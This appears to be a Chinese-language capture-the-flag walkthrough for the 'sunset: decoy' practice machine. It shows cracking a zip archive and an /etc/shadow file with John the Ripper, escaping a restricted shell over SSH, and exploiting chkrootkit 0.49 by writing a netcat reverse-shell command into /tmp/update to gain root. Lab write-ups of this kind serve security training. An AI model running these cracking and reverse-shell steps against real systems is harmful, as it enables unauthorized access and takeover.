sunset:decoy靶机

信息收集

打靶之前修改网卡配置

按e进入

将ro改成rw signie init=/bin/bash

ctrl+x重启服务

ctrl+x重启服务

查看当前网卡IP信息

编辑vim /etc/network/interfaces

看到下载的靶机网卡配置文件与实际的网卡名称并不一致

将此处的enp0s3的网卡替换成我们自己的ens33

（这里的修改方式有些不同，按下i键后进入修改模式，此时可以使用方向键控制光标位置，按下键盘上的字母即可实现输入，按下x键即删除光标后的下一个数据，在修改模式下按下Esc键退出修改模式。）

重启网卡服务 /etc/init.d/networking restart

1.查看靶机的mac地址并将它的网络连接模式设置成nat

2.由于上边发现了IP地址直接扫描端口

3.漏洞发现

发现ssh上有OpenSSH 7.9p1组件的Nday漏洞。

kali扫描

searchsploit OpenSSH 7.9

没有发现

4.在80端口在搜索一下

searchsploit Apache httpd 2.4.38

也是没有发现

5.访问主页

发现一个save.zip文件

getshell

1.将他下载到kali并解压

发现需要密码才能解压

2.使用命令zipinfo save.zip查看压缩包里的文件，发现/etc/shadow文件，如果能获取到，并爆破出SSH密码，就能登录SSH服务了。

3.使用命令zip2john save.zip > save.zip.hash和john save.zip.hash爆破压缩包的解压密码，获得save.zip的解压密码manuel。

4.解压文件并查看它的shadow文件

5.使用命令 john ./etc/shadow --format=crypt爆破./etc/shadow文件中的SSH密码，获得SSH用户296640a3b825115a47b68fc44501c828的SSH密码server。

6.ssh登录

ssh 296640a3b825115a47b68fc44501c828@192.168.42.194

7.登录成功发现他是普通用户权限

提权

1.sudo suid提权

sudo -l
find / -perm -u=s -ls 2>/dev/null

没有发现

2.使用命令PATH=/usr/bin:$PATH添加find命令的存放路径，发现只有读权限，无法添加。

3.那就不依赖环境变量了，带上存放路径使用命令 /usr/bin/find / -perm -u=s -ls，提示命令名称中不能带有/，这个方法也得堵死了。

由于/命令用不了咱们可以看看可以解除这个限制

4.经过网上搜索和man ssh手册查询，发现ssh命令使用参数-t "bash --noprofile"可以强制分配伪终端，从而解决命令行受限问题，例如能够添加环境变量了。 重新连接ssh

ssh 296640a3b825115a47b68fc44501c828@192.168.42.194 -t "bash --noprofile"
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/games:/usr/games:$PATH

5.看看有没有限制（继续sudo提权或者suid提权）

sudo -l
find / -perm -u=s -ls 2>/dev/null

6.使用在线网站查看suid提权

发现没有一个

7.使用命令ls -la和cd，发现pspy的日志文件。pspy是Linux系统的进程监控工具，可以记录进程的运行情况，包括启动进程的命令，一定程度上类似于详细版的history命令。

8.在pspy的日志文件中，发现曾经执行过解压chkrootkit-0.49.tar.gz文件的命令，也就是系统可能使用0.49版本的chkrootkit程序。

9.查询chkrootkit漏洞

searchsploit chkrootkit

10.查询系统中与chkrootkit相关的文件

find / -name *chkrootkit* 2>/dev/null

发现没有

11.回想前面发现的honeypot.decoy程序，里面的AV Scan病毒扫描功能，会不会集成了chkrootkit的后门检查能力呢？

honeypot.decoy

12.使用命令for i in $(seq 1 300); do ps -ef | grep -v grep | grep chkrootkit; sleep 1; done;观察5分钟内的进程运行情况。

13.可以看到root用户会执行0.49版本的chkrootkit程序，将前边的exp复制到当前目录下

14.查看exp

cat 33899.txt

可以看到漏洞利用的方式有：1、使用非root用户，创建一个名为/tmp/update的可执行程序，内含提权代码；2、使用root用户，运行0.49版本的chkrootkit程序。

15.反弹shell

echo nc -nv 192.168.42.128 4444 -e /bin/bash > /tmp/update
chmod +x /tmp/update使用非root用户，也就是当前的296640a3b825115a47b68fc44501c828用户，执行命令 echo nc -nv 10.8.0.110 4444 -e /bin/bash > /tmp/update，创建一个名为/tmp/update的可执行程序，内含提权代码。

/usr/bin/touch /dev/shm/STTY5246
honeypot.decoy使用root用户，运行0.49版本的chkrootkit程序，也就是通过使用命令/usr/bin/touch /dev/shm/STTY5246，或者使用程序honeypot.decoy的功能5 Launch an AV Scan.，或者甚至什么也不做，来调用root用户运行0.49版本的chkrootkit程序。

同时在本地启动监听

nc -lvvp 4444

 

16.等待一会后成功反弹

并且用户为高权限用户

提权成功